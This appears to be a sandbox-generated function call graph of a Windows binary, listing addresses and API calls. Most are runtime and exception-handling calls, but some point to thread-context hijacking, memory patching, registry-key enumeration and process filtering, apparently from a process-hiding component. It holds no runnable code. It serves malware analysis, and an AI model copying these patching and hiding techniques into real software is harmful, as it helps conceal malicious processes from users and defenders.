8948->8944 8950 2a6613090a8 8949->8950 8951 2a66130c2f4 14 API calls 8950->8951 8952 2a6613090b1 8951->8952 8953 2a66130c2f4 14 API calls 8952->8953 8954 2a6613090bd 8953->8954 8424 2a661305fcc 8425 2a661305fd3 8424->8425 8426 2a661306000 VirtualProtect 8425->8426 8427 2a661305f10 8425->8427 8426->8427 8428 2a661306029 GetLastError 8426->8428 8428->8427 8955 2a66130824c 8956 2a661308270 __scrt_release_startup_lock 8955->8956 8957 2a66130b581 8956->8957 8958 2a66130cb10 __std_exception_copy 13 API calls 8956->8958 8959 2a66130b5aa 8958->8959 7959 2a66131494f 7960 2a661314968 7959->7960 7961 2a66131495e 7959->7961 7963 2a66130c5ac LeaveCriticalSection 7961->7963 8429 2a6613119d0 8430 2a66130e864 56 API calls 8429->8430 8431 2a6613119d9 8430->8431 8960 2a661302e54 8962 2a661302ea8 8960->8962 8961 2a661302ec3 8962->8961 8964 2a6613037f4 8962->8964 8965 2a66130388a 8964->8965 8967 2a661303819 8964->8967 8965->8961 8966 2a661303f88 StrCmpNIW 8966->8967 8967->8965 8967->8966 8968 2a661301e08 StrCmpIW StrCmpW 8967->8968 8968->8967 9148 2a66130b0d4 9155 2a66130b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9148->9155 9149 2a66130b0fb 9150 2a661309324 __CxxCallCatchBlock 9 API calls 9149->9150 9151 2a66130b100 9150->9151 9152 2a661309324 __CxxCallCatchBlock 9 API calls 9151->9152 9153 2a66130b10b __FrameHandler3::GetHandlerSearchState 9151->9153 9152->9153 9154 2a6613099cc 9 API calls Is_bad_exception_allowed 9154->9155 9155->9149 9155->9153 9155->9154 9157 2a6613099f4 9155->9157 9158 2a661309324 __CxxCallCatchBlock 9 API calls 9157->9158 9159 2a661309a02 9158->9159 9159->9155 9160 2a6613034b8 9161 2a6613034e8 9160->9161 9162 2a6613035a1 9161->9162 9163 2a661303505 PdhGetCounterInfoW 9161->9163 9163->9162 9164 2a661303523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 9163->9164 9165 2a66130358d GetProcessHeap HeapFree 9164->9165 9166 2a661303555 StrCmpW 9164->9166 9165->9162 9166->9165 9168 2a66130356a 9166->9168 9167 2a661303950 12 API calls 9167->9168 9168->9165 9168->9167 7467 2a661301e3c LoadLibraryA GetProcAddress 7468 2a661301e6f 7467->7468 7469 2a661301e62 SleepEx 7467->7469 7469->7469 8432 2a6613081c0 8433 2a6613081c9 __scrt_release_startup_lock 8432->8433 8434 2a6613081cd 8433->8434 8436 2a66130bbb4 8433->8436 8437 2a66130bbd4 8436->8437 8447 2a66130bbed 8436->8447 8438 2a66130bbdc 8437->8438 8439 2a66130bbf2 8437->8439 8441 2a66130d1f4 __std_exception_copy 13 API calls 8438->8441 8440 2a66130e864 56 API calls 8439->8440 8442 2a66130bbf7 8440->8442 8443 2a66130bbe1 8441->8443 8465 2a66130df38 GetModuleFileNameW 8442->8465 8445 2a66130d04c _invalid_parameter_noinfo 38 API calls 8443->8445 8445->8447 8447->8434 8452 2a66130bc69 8455 2a66130d1f4 __std_exception_copy 13 API calls 8452->8455 8453 2a66130bc7a 8454 2a66130b994 14 API calls 8453->8454 8457 2a66130bc96 8454->8457 8463 2a66130bc6e 8455->8463 8456 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8456->8447 8458 2a66130bcc6 8457->8458 8459 2a66130bcdf 8457->8459 8457->8463 8460 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8458->8460 8462 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8459->8462 8461 2a66130bccf 8460->8461 8464 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8461->8464 8462->8463 8463->8456 8464->8447 8466 2a66130df7d GetLastError 8465->8466 8467 2a66130df91 8465->8467 8489 2a66130d184 8466->8489 8469 2a66130dd78 14 API calls 8467->8469 8471 2a66130dfbf 8469->8471 8470 2a66130df8a 8472 2a661308070 _invalid_parameter_noinfo 8 API calls 8470->8472 8474 2a66130dfd0 8471->8474 8494 2a66130f198 8471->8494 8476 2a66130bc0e 8472->8476 8498 2a66130de1c 8474->8498 8477 2a66130b994 8476->8477 8479 2a66130b9d2 8477->8479 8480 2a66130ba38 8479->8480 8515 2a66130ec1c 8479->8515 8481 2a66130bb25 8480->8481 8482 2a66130ec1c 14 API calls 8480->8482 8483 2a66130bb54 8481->8483 8482->8480 8484 2a66130bb6c 8483->8484 8488 2a66130bba4 8483->8488 8485 2a66130d220 __std_exception_copy 13 API calls 8484->8485 8484->8488 8486 2a66130bb9a 8485->8486 8487 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8486->8487 8487->8488 8488->8452 8488->8453 8512 2a66130d1d0 8489->8512 8491 2a66130d191 Concurrency::details::SchedulerProxy::DeleteThis 8492 2a66130d1f4 __std_exception_copy 13 API calls 8491->8492 8493 2a66130d1a1 8492->8493 8493->8470 8495 2a66130f1a9 8494->8495 8496 2a66130f1ca 8494->8496 8495->8496 8497 2a66130ef88 9 API calls 8495->8497 8496->8474 8497->8496 8499 2a66130de5b 8498->8499 8500 2a66130de40 8498->8500 8501 2a66130ece8 WideCharToMultiByte 8499->8501 8507 2a66130de60 8499->8507 8500->8470 8502 2a66130deb7 8501->8502 8504 2a66130debe GetLastError 8502->8504 8506 2a66130dee9 8502->8506 8502->8507 8503 2a66130d1f4 __std_exception_copy 13 API calls 8503->8500 8505 2a66130d184 13 API calls 8504->8505 8509 2a66130decb 8505->8509 8508 2a66130ece8 WideCharToMultiByte 8506->8508 8507->8500 8507->8503 8510 2a66130df10 8508->8510 8511 2a66130d1f4 __std_exception_copy 13 API calls 8509->8511 8510->8500 8510->8504 8511->8500 8513 2a66130cb10 __std_exception_copy 13 API calls 8512->8513 8514 2a66130d1d9 8513->8514 8514->8491 8516 2a66130eba8 8515->8516 8517 2a66130dd78 14 API calls 8516->8517 8518 2a66130ebcc 8517->8518 8518->8479 7964 2a66130ff40 7965 2a66130ff4b 7964->7965 7973 2a661312c24 7965->7973 7986 2a66130c558 EnterCriticalSection 7973->7986 8969 2a66130f440 GetProcessHeap 8519 2a6613147c2 8520 2a661309978 __CxxCallCatchBlock 9 API calls 8519->8520 8524 2a6613147d5 8520->8524 8521 2a661314814 __CxxCallCatchBlock 8522 2a661309324 __CxxCallCatchBlock 9 API calls 8521->8522 8523 2a661314828 8522->8523 8525 2a661309324 __CxxCallCatchBlock 9 API calls 8523->8525 8524->8521 8527 2a661308ff8 __CxxCallCatchBlock 9 API calls 8524->8527 8526 2a661314838 8525->8526 8527->8521 8970 2a66130ae42 8971 2a661309324 __CxxCallCatchBlock 9 API calls 8970->8971 8973 2a66130ae4f __CxxCallCatchBlock 8971->8973 8972 2a66130ae93 RaiseException 8974 2a66130aeba 8972->8974 8973->8972 8975 2a661309978 __CxxCallCatchBlock 9 API calls 8974->8975 8980 2a66130aec2 8975->8980 8976 2a66130aeeb __CxxCallCatchBlock 8977 2a661309324 __CxxCallCatchBlock 9 API calls 8976->8977 8978 2a66130aefe 8977->8978 8979 2a661309324 __CxxCallCatchBlock 9 API calls 8978->8979 8982 2a66130af07 8979->8982 8980->8976 8981 2a661308ff8 __CxxCallCatchBlock 9 API calls 8980->8981 8981->8976 7470 2a661301bc4 7477 2a661301724 GetProcessHeap HeapAlloc 7470->7477 7472 2a661301bda SleepEx 7473 2a661301724 50 API calls 7472->7473 7475 2a661301bd3 7473->7475 7475->7472 7476 2a66130159c StrCmpIW StrCmpW 7475->7476 7528 2a6613019b0 7475->7528 7476->7475 7545 2a661301264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7477->7545 7479 2a66130174c 7546 2a661301000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7479->7546 7481 2a661301754 7547 2a661301264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7481->7547 7483 2a66130175d 7548 2a661301264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7483->7548 7485 2a661301766 7549 2a661301264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7485->7549 7487 2a66130176f 7550 2a661301000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7487->7550 7489 2a661301778 7551 2a661301000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7489->7551 7491 2a661301781 7552 2a661301000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7491->7552 7493 2a66130178a RegOpenKeyExW 7494 2a6613017bc RegOpenKeyExW 7493->7494 7495 2a6613019a2 7493->7495 7496 2a6613017fb RegOpenKeyExW 7494->7496 7497 2a6613017e5 7494->7497 7495->7475 7499 2a661301836 RegOpenKeyExW 7496->7499 7500 2a66130181f 7496->7500 7553 2a6613012b8 RegQueryInfoKeyW 7497->7553 7502 2a66130185a 7499->7502 7503 2a661301871 RegOpenKeyExW 7499->7503 7562 2a66130104c RegQueryInfoKeyW 7500->7562 7506 2a6613012b8 16 API calls 7502->7506 7507 2a6613018ac RegOpenKeyExW 7503->7507 7508 2a661301895 7503->7508 7509 2a661301867 RegCloseKey 7506->7509 7511 2a6613018e7 RegOpenKeyExW 7507->7511 7512 2a6613018d0 7507->7512 7510 2a6613012b8 16 API calls 7508->7510 7509->7503 7513 2a6613018a2 RegCloseKey 7510->7513 7515 2a66130190b 7511->7515 7516 2a661301922 RegOpenKeyExW 7511->7516 7514 2a6613012b8 16 API calls 7512->7514 7513->7507 7520 2a6613018dd RegCloseKey 7514->7520 7517 2a66130104c 6 API calls 7515->7517 7518 2a661301946 7516->7518 7519 2a66130195d RegOpenKeyExW 7516->7519 7521 2a661301918 RegCloseKey 7517->7521 7522 2a66130104c 6 API calls 7518->7522 7523 2a661301998 RegCloseKey 7519->7523 7524 2a661301981 7519->7524 7520->7511 7521->7516 7525 2a661301953 RegCloseKey 7522->7525 7523->7495 7526 2a66130104c 6 API calls 7524->7526 7525->7519 7527 2a66130198e RegCloseKey 7526->7527 7527->7523 7572 2a6613014a0 7528->7572 7545->7479 7546->7481 7547->7483 7548->7485 7549->7487 7550->7489 7551->7491 7552->7493 7554 2a661301486 RegCloseKey 7553->7554 7555 2a661301323 GetProcessHeap HeapAlloc 7553->7555 7554->7496 7556 2a66130134e RegEnumValueW 7555->7556 7557 2a661301472 GetProcessHeap HeapFree 7555->7557 7558 2a6613013a1 7556->7558 7557->7554 7558->7556 7558->7557 7560 2a66130141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7558->7560 7561 2a6613013cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7558->7561 7567 2a661301530 7558->7567 7560->7558 7561->7560 7563 2a6613011b5 RegCloseKey 7562->7563 7565 2a6613010bf 7562->7565 7563->7499 7564 2a6613010cf RegEnumValueW 7564->7565 7565->7563 7565->7564 7566 2a66130114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7565->7566 7566->7565 7568 2a661301580 7567->7568 7571 2a66130154a 7567->7571 7568->7558 7569 2a661301569 StrCmpW 7569->7571 7570 2a661301561 StrCmpIW 7570->7571 7571->7568 7571->7569 7571->7570 7573 2a6613014e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7572->7573 7574 2a6613014c2 GetProcessHeap HeapFree 7572->7574 7574->7573 7574->7574 8528 2a6613033a8 8529 2a6613033cf 8528->8529 8530 2a66130349c 8529->8530 8531 2a6613033ec PdhGetCounterInfoW 8529->8531 8531->8530 8532 2a66130340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 8531->8532 8533 2a661303488 GetProcessHeap HeapFree 8532->8533 8534 2a661303440 StrCmpW 8532->8534 8533->8530 8534->8533 8536 2a661303455 8534->8536 8536->8533 8537 2a661303950 StrCmpNW 8536->8537 8538 2a6613039f2 8537->8538 8539 2a661303982 StrStrW 8537->8539 8538->8536 8539->8538 8540 2a66130399b StrToIntW 8539->8540 8540->8538 8541 2a6613039c3 8540->8541 8541->8538 8547 2a661301a30 OpenProcess 8541->8547 8544 2a661303f88 StrCmpNIW 8545 2a6613039e4 8544->8545 8545->8538 8546 2a661301cfc 2 API calls 8545->8546 8546->8538 8548 2a661301ab6 8547->8548 8549 2a661301a64 K32GetModuleFileNameExW 8547->8549 8548->8538 8548->8544 8550 2a661301aad CloseHandle 8549->8550 8551 2a661301a7e PathFindFileNameW lstrlenW 8549->8551 8550->8548 8551->8550 8552 2a661301a9c StrCpyW 8551->8552 8552->8550 8553 2a661310fa8 8554 2a661310fcc 8553->8554 8555 2a661308070 _invalid_parameter_noinfo 8 API calls 8554->8555 8556 2a66131100e 8555->8556 8983 2a66130c828 8984 2a66130c842 8983->8984 8985 2a66130c82d 8983->8985 8989 2a66130c848 8985->8989 8990 2a66130c892 8989->8990 8991 2a66130c88a 8989->8991 8993 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8990->8993 8992 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8991->8992 8992->8990 8994 2a66130c89f 8993->8994 8995 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8994->8995 8996 2a66130c8ac 8995->8996 8997 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8996->8997 8998 2a66130c8b9 8997->8998 8999 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8998->8999 9000 2a66130c8c6 8999->9000 9001 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9000->9001 9002 2a66130c8d3 9001->9002 9003 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9002->9003 9004 2a66130c8e0 9003->9004 9005 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9004->9005 9006 2a66130c8ed 9005->9006 9007 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9006->9007 9008 2a66130c8fd 9007->9008 9009 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9008->9009 9010 2a66130c90d 9009->9010 9015 2a66130c6f8 9010->9015 9029 2a66130c558 EnterCriticalSection 9015->9029 9169 2a66130aaac 9170 2a66130aad9 __except_validate_context_record 9169->9170 9171 2a661309324 __CxxCallCatchBlock 9 API calls 9170->9171 9172 2a66130aade 9171->9172 9174 2a66130ab38 9172->9174 9176 2a66130abc6 9172->9176 9183 2a66130ab8c 9172->9183 9173 2a66130ac34 9173->9183 9211 2a66130a22c 9173->9211 9175 2a66130abb3 9174->9175 9174->9183 9184 2a66130ab5a __GetCurrentState 9174->9184 9198 2a6613095d0 9175->9198 9180 2a66130abe5 9176->9180 9205 2a6613099cc 9176->9205 9180->9173 9180->9183 9208 2a6613099e0 9180->9208 9181 2a66130acdd 9184->9181 9186 2a66130afb8 9184->9186 9187 2a6613099cc Is_bad_exception_allowed 9 API calls 9186->9187 9188 2a66130afe7 __GetCurrentState 9187->9188 9189 2a661309324 __CxxCallCatchBlock 9 API calls 9188->9189 9196 2a66130b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9189->9196 9190 2a66130b0fb 9191 2a661309324 __CxxCallCatchBlock 9 API calls 9190->9191 9192 2a66130b100 9191->9192 9193 2a661309324 __CxxCallCatchBlock 9 API calls 9192->9193 9195 2a66130b10b __FrameHandler3::GetHandlerSearchState 9192->9195 9193->9195 9194 2a6613099cc 9 API calls Is_bad_exception_allowed 9194->9196 9195->9183 9196->9190 9196->9194 9196->9195 9197 2a6613099f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9196->9197 9197->9196 9268 2a661309634 9198->9268 9200 2a6613095ef __FrameHandler3::GetHandlerSearchState 9272 2a661309540 9200->9272 9203 2a66130afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9204 2a661309624 9203->9204 9204->9183 9206 2a661309324 __CxxCallCatchBlock 9 API calls 9205->9206 9207 2a6613099d5 9206->9207 9207->9180 9209 2a661309324 __CxxCallCatchBlock 9 API calls 9208->9209 9210 2a6613099e9 9209->9210 9210->9173 9276 2a66130b144 9211->9276 9213 2a66130a6f4 9214 2a66130a645 9214->9213 9254 2a66130a643 9214->9254 9329 2a66130a6fc 9214->9329 9215 2a66130a373 9215->9214 9240 2a66130a3ab 9215->9240 9216 2a661309324 __CxxCallCatchBlock 9 API calls 9219 2a66130a687 9216->9219 9219->9213 9223 2a661308070 _invalid_parameter_noinfo 8 API calls 9219->9223 9220 2a66130a575 9224 2a66130a592 9220->9224 9226 2a6613099cc Is_bad_exception_allowed 9 API calls 9220->9226 9220->9254 9221 2a661309324 __CxxCallCatchBlock 9 API calls 9222 2a66130a2da 9221->9222 9222->9219 9227 2a661309324 __CxxCallCatchBlock 9 API calls 9222->9227 9225 2a66130a69a 9223->9225 9231 2a66130a5b4 9224->9231 9224->9254 9322 2a6613095a4 9224->9322 9225->9183 9226->9224 9228 2a66130a2ea 9227->9228 9230 2a661309324 __CxxCallCatchBlock 9 API calls 9228->9230 9233 2a66130a2f3 9230->9233 9232 2a66130a5ca 9231->9232 9231->9254 9265 2a66130a6d7 9231->9265 9234 2a66130a5d5 9232->9234 9237 2a6613099cc Is_bad_exception_allowed 9 API calls 9232->9237 9287 2a661309a0c 9233->9287 9242 2a66130b1dc 9 API calls 9234->9242 9235 2a661309324 __CxxCallCatchBlock 9 API calls 9238 2a66130a6dd 9235->9238 9237->9234 9241 2a661309324 __CxxCallCatchBlock 9 API calls 9238->9241 9240->9220 9243 2a6613099e0 9 API calls 9240->9243 9301 2a66130a96c 9240->9301 9315 2a66130a158 9240->9315 9244 2a66130a6e6 9241->9244 9245 2a66130a5eb 9242->9245 9243->9240 9247 2a66130c2f4 14 API calls 9244->9247 9249 2a661309634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9245->9249 9245->9254 9246 2a661309324 __CxxCallCatchBlock 9 API calls 9248 2a66130a335 9246->9248 9247->9213 9248->9215 9251 2a661309324 __CxxCallCatchBlock 9 API calls 9248->9251 9250 2a66130a605 9249->9250 9326 2a661309838 RtlUnwindEx 9250->9326 9253 2a66130a341 9251->9253 9255 2a661309324 __CxxCallCatchBlock 9 API calls 9253->9255 9254->9216 9257 2a66130a34a 9255->9257 9290 2a66130b1dc 9257->9290 9261 2a66130a35e 9297 2a66130b2cc 9261->9297 9263 2a66130a6d1 9264 2a66130c2f4 14 API calls 9263->9264 9264->9265 9265->9235 9266 2a66130a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 9266->9263 9267 2a661309178 Concurrency::cancel_current_task 2 API calls 9266->9267 9267->9263 9271 2a661309662 __FrameHandler3::GetHandlerSearchState 9268->9271 9269 2a6613096d4 9269->9200 9270 2a66130968c RtlLookupFunctionEntry 9270->9271 9271->9269 9271->9270 9273 2a66130958b 9272->9273 9274 2a661309560 9272->9274 9273->9203 9274->9273 9275 2a661309324 __CxxCallCatchBlock 9 API calls 9274->9275 9275->9274 9277 2a66130b169 __FrameHandler3::GetHandlerSearchState 9276->9277 9278 2a661309634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9277->9278 9279 2a66130b17e 9278->9279 9341 2a661309db4 9279->9341 9282 2a66130b190 __FrameHandler3::GetHandlerSearchState 9344 2a661309dec 9282->9344 9283 2a66130b1b3 9284 2a661309db4 __GetUnwindTryBlock RtlLookupFunctionEntry 9283->9284 9285 2a66130a28e 9284->9285 9285->9213 9285->9215 9285->9221 9288 2a661309324 __CxxCallCatchBlock 9 API calls 9287->9288 9289 2a661309a1a 9288->9289 9289->9213 9289->9246 9291 2a66130b2c3 9290->9291 9294 2a66130b207 9290->9294 9292 2a66130a35a 9292->9215 9292->9261 9293 2a6613099e0 9 API calls 9293->9294 9294->9292 9294->9293 9295 2a6613099cc Is_bad_exception_allowed 9 API calls 9294->9295 9296 2a66130a96c 9 API calls 9294->9296 9295->9294 9296->9294 9298 2a66130b339 9297->9298 9299 2a66130b2e9 Is_bad_exception_allowed 9297->9299 9298->9266 9299->9298 9300 2a6613099cc 9 API calls Is_bad_exception_allowed 9299->9300 9300->9299 9302 2a66130a999 9301->9302 9314 2a66130aa28 9301->9314 9303 2a6613099cc Is_bad_exception_allowed 9 API calls 9302->9303 9304 2a66130a9a2 9303->9304 9305 2a6613099cc Is_bad_exception_allowed 9 API calls 9304->9305 9306 2a66130a9bb 9304->9306 9304->9314 9305->9306 9307 2a66130a9e7 9306->9307 9308 2a6613099cc Is_bad_exception_allowed 9 API calls 9306->9308 9306->9314 9309 2a6613099e0 9 API calls 9307->9309 9308->9307 9310 2a66130a9fb 9309->9310 9311 2a66130aa14 9310->9311 9312 2a6613099cc Is_bad_exception_allowed 9 API calls 9310->9312 9310->9314 9313 2a6613099e0 9 API calls 9311->9313 9312->9311 9313->9314 9314->9240 9316 2a661309634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9315->9316 9317 2a66130a195 9316->9317 9318 2a6613099cc Is_bad_exception_allowed 9 API calls 9317->9318 9319 2a66130a1cd 9318->9319 9320 2a661309838 9 API calls 9319->9320 9321 2a66130a211 9320->9321 9321->9240 9323 2a6613095b8 __FrameHandler3::GetHandlerSearchState 9322->9323 9324 2a661309540 __FrameHandler3::ExecutionInCatch 9 API calls 9323->9324 9325 2a6613095c2 9324->9325 9325->9231 9327 2a661308070 _invalid_parameter_noinfo 8 API calls 9326->9327 9328 2a661309932 9327->9328 9328->9254 9330 2a66130a948 9329->9330 9331 2a66130a735 9329->9331 9330->9254 9332 2a661309324 __CxxCallCatchBlock 9 API calls 9331->9332 9333 2a66130a73a 9332->9333 9334 2a66130a759 EncodePointer 9333->9334 9340 2a66130a7ac 9333->9340 9335 2a661309324 __CxxCallCatchBlock 9 API calls 9334->9335 9336 2a66130a769 9335->9336 9336->9340 9347 2a6613094ec 9336->9347 9338 2a6613099cc 9 API calls Is_bad_exception_allowed 9338->9340 9339 2a66130a158 19 API calls 9339->9340 9340->9330 9340->9338 9340->9339 9342 2a661309634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9341->9342 9343 2a661309dc7 9342->9343 9343->9282 9343->9283 9345 2a661309634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 9344->9345 9346 2a661309e06 9345->9346 9346->9285 9348 2a661309324 __CxxCallCatchBlock 9 API calls 9347->9348 9349 2a661309518 9348->9349 9349->9340 9031 2a661306430 9032 2a66130643d 9031->9032 9033 2a661306449 9032->9033 9038 2a66130655a 9032->9038 9034 2a6613064cd 9033->9034 9035 2a6613064a6 SetThreadContext 9033->9035 9035->9034 9036 2a66130663e 9039 2a66130665e 9036->9039 9041 2a661304b20 VirtualFree 9036->9041 9037 2a661306581 VirtualProtect FlushInstructionCache 9037->9038 9038->9036 9038->9037 9040 2a661305530 3 API calls 9039->9040 9044 2a661306663 9040->9044 9041->9039 9042 2a6613066b7 9045 2a661308070 _invalid_parameter_noinfo 8 API calls 9042->9045 9043 2a661306677 ResumeThread 9043->9044 9044->9042 9044->9043 9046 2a6613066ff 9045->9046 9047 2a66130ec30 GetCommandLineA GetCommandLineW 9350 2a661302ab4 TlsGetValue TlsGetValue TlsGetValue 9351 2a661302b0d 9350->9351 9356 2a661302b79 9350->9356 9353 2a661302b15 9351->9353 9351->9356 9352 2a661302b74 9353->9352 9354 2a661302c32 TlsSetValue TlsSetValue TlsSetValue 9353->9354 9355 2a661303f88 StrCmpNIW 9353->9355 9354->9352 9355->9353 9356->9352 9356->9354 9357 2a661303f88 StrCmpNIW 9356->9357 9357->9356 7990 2a66130bd34 7991 2a66130bd4d 7990->7991 7992 2a66130bd49 7990->7992 8005 2a66130e864 7991->8005 7997 2a66130bd6b 8031 2a66130bda8 7997->8031 7998 2a66130bd5f 7999 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7998->7999 7999->7992 8002 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8003 2a66130bd92 8002->8003 8004 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8003->8004 8004->7992 8006 2a66130e871 8005->8006 8010 2a66130bd52 8005->8010 8050 2a66130cacc 8006->8050 8008 2a66130e8a0 8055 2a66130e53c 8008->8055 8011 2a66130edc8 GetEnvironmentStringsW 8010->8011 8012 2a66130bd57 8011->8012 8014 2a66130edf8 8011->8014 8012->7997 8012->7998 8013 2a66130ece8 WideCharToMultiByte 8015 2a66130ee49 8013->8015 8014->8013 8016 2a66130ee53 FreeEnvironmentStringsW 8015->8016 8017 2a66130c5d0 14 API calls 8015->8017 8016->8012 8018 2a66130ee63 8017->8018 8019 2a66130ee6b 8018->8019 8020 2a66130ee74 8018->8020 8021 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8019->8021 8022 2a66130ece8 WideCharToMultiByte 8020->8022 8023 2a66130ee72 8021->8023 8024 2a66130ee97 8022->8024 8023->8016 8025 2a66130ee9b 8024->8025 8026 2a66130eea5 8024->8026 8027 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8025->8027 8028 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8026->8028 8029 2a66130eea3 FreeEnvironmentStringsW 8027->8029 8028->8029 8029->8012 8032 2a66130bdcd 8031->8032 8033 2a66130d220 __std_exception_copy 13 API calls 8032->8033 8046 2a66130be03 8033->8046 8034 2a66130be0b 8035 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8034->8035 8037 2a66130bd73 8035->8037 8036 2a66130be6d 8038 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8036->8038 8037->8002 8038->8037 8039 2a66130d220 __std_exception_copy 13 API calls 8039->8046 8040 2a66130be92 8246 2a66130bebc 8040->8246 8042 2a66130c328 __std_exception_copy 38 API calls 8042->8046 8044 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8044->8034 8045 2a66130bea6 8047 2a66130d06c _invalid_parameter_noinfo 17 API calls 8045->8047 8046->8034 8046->8036 8046->8039 8046->8040 8046->8042 8046->8045 8048 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8046->8048 8049 2a66130beb9 8047->8049 8048->8046 8051 2a66130cae8 FlsGetValue 8050->8051 8052 2a66130cae4 8050->8052 8051->8052 8053 2a66130cafe 8052->8053 8054 2a66130c940 __std_exception_copy 13 API calls 8052->8054 8053->8008 8054->8053 8078 2a66130e7ac 8055->8078 8060 2a66130e58e 8060->8010 8063 2a66130e5a7 8064 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8063->8064 8064->8060 8065 2a66130e5b6 8065->8065 8104 2a66130e8e0 8065->8104 8068 2a66130e6b2 8069 2a66130d1f4 __std_exception_copy 13 API calls 8068->8069 8071 2a66130e6b7 8069->8071 8070 2a66130e70d 8073 2a66130e774 8070->8073 8115 2a66130e05c 8070->8115 8074 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8071->8074 8072 2a66130e6cc 8072->8070 8075 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8072->8075 8077 2a66130d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8073->8077 8074->8060 8075->8070 8077->8060 8079 2a66130e7cf 8078->8079 8085 2a66130e7d9 8079->8085 8130 2a66130c558 EnterCriticalSection 8079->8130 8084 2a66130e571 8090 2a66130e22c 8084->8090 8085->8084 8087 2a66130cacc 14 API calls 8085->8087 8088 2a66130e8a0 8087->8088 8089 2a66130e53c 56 API calls 8088->8089 8089->8084 8131 2a66130dd78 8090->8131 8093 2a66130e24c GetOEMCP 8095 2a66130e273 8093->8095 8094 2a66130e25e 8094->8095 8096 2a66130e263 GetACP 8094->8096 8095->8060 8097 2a66130c5d0 8095->8097 8096->8095 8098 2a66130c61b 8097->8098 8102 2a66130c5df __std_exception_copy 8097->8102 8100 2a66130d1f4 __std_exception_copy 13 API calls 8098->8100 8099 2a66130c602 HeapAlloc 8101 2a66130c619 8099->8101 8099->8102 8100->8101 8101->8063 8101->8065 8102->8098 8102->8099 8103 2a66130b470 __std_exception_copy 2 API calls 8102->8103 8103->8102 8105 2a66130e22c 16 API calls 8104->8105 8106 2a66130e91b 8105->8106 8107 2a66130ea71 8106->8107 8108 2a66130e958 IsValidCodePage 8106->8108 8114 2a66130e972 8106->8114 8109 2a661308070 _invalid_parameter_noinfo 8 API calls 8107->8109 8108->8107 8110 2a66130e969 8108->8110 8111 2a66130e6a9 8109->8111 8112 2a66130e998 GetCPInfo 8110->8112 8110->8114 8111->8068 8111->8072 8112->8107 8112->8114 8147 2a66130e344 8114->8147 8245 2a66130c558 EnterCriticalSection 8115->8245 8132 2a66130dd9c 8131->8132 8138 2a66130dd97 8131->8138 8133 2a66130cab0 _invalid_parameter_noinfo 14 API calls 8132->8133 8132->8138 8134 2a66130ddb7 8133->8134 8139 2a66130ffb4 8134->8139 8138->8093 8138->8094 8140 2a66130ffc9 8139->8140 8141 2a66130ddda 8139->8141 8140->8141 8142 2a661310a40 _invalid_parameter_noinfo 14 API calls 8140->8142 8143 2a661310020 8141->8143 8142->8141 8144 2a661310048 8143->8144 8145 2a661310035 8143->8145 8144->8138 8145->8144 8146 2a66130e8c4 _invalid_parameter_noinfo 14 API calls 8145->8146 8146->8144 8148 2a66130e38f GetCPInfo 8147->8148 8149 2a66130e485 8147->8149 8148->8149 8154 2a66130e3a2 8148->8154 8150 2a661308070 _invalid_parameter_noinfo 8 API calls 8149->8150 8152 2a66130e524 8150->8152 8152->8107 8158 2a661311474 8154->8158 8159 2a66130dd78 